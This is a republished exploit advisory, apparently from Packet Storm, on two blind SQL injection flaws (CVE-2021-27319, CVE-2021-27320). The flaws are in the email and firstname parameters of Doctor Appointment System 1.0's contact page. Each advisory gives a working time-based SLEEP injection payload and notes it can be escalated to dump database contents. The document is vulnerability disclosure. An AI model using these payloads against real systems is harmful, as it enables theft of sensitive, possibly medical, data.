Doctor Appointment System 1.0 Blind SQL Injection ≈ Packet Storm – Digitalmunition




Exploit/Advisories no-image-featured-image.png

Published on March 4th, 2021 📆 | 2744 Views ⚑

0

Doctor Appointment System 1.0 Blind SQL Injection ≈ Packet Storm

# Exploit Title: Doctor Appointment System 1.0 Blind SQL injection in email parameter
# Date: 03-03-2021
# CVE: CVE-2021-27319
# Exploit Author: Nakul Ratti
# Vendor Homepage:
https://www.sourcecodester.com/php/14182/doctor-appointment-system.html
# Software Link:
https://www.sourcecodester.com/php/14182/doctor-appointment-system.html
# Version: V1.0

Vulnerable File:
—————-
http://host/doctorappointment/contactus.php

Vulnerable Issue:
—————–
email parameter has no input validation

POC:
—-
1] Navigate to http://host/doctorappointment/contactus.php
2] In the email parameter enter following payload to exploit blind SQL
Injection: ‘+AND+(SELECT+7827+FROM+(SELECT(SLEEP(10)))xEII)+AND+’1’%3d’1
3] This can further be escalated to dump sensitive information from the
database
——————

# Exploit Title: Doctor Appointment System 1.0 Blind SQL injection in firstname parameter
# Date: 03-03-2021
# CVE: CVE-2021-27320
# Exploit Author: Nakul Ratti
# Vendor Homepage:
https://www.sourcecodester.com/php/14182/doctor-appointment-system.html
# Software Link:
https://www.sourcecodester.com/php/14182/doctor-appointment-system.html
# Version: V1.0

Vulnerable File:
—————-
http://host/doctorappointment/contactus.php

Vulnerable Issue:
—————–
firstname parameter has no input validation

POC:
—-
1] Navigate to http://host/doctorappointment/contactus.php
2] In the firstname parameter enter following payload to exploit blind SQL
Injection: ‘+AND+(SELECT+7827+FROM+(SELECT(SLEEP(10)))xEII)+AND+’1’%3d’1
3] This can further be escalated to dump sensitive information from the
database
——————

Source link

Tagged with:



Leave a Reply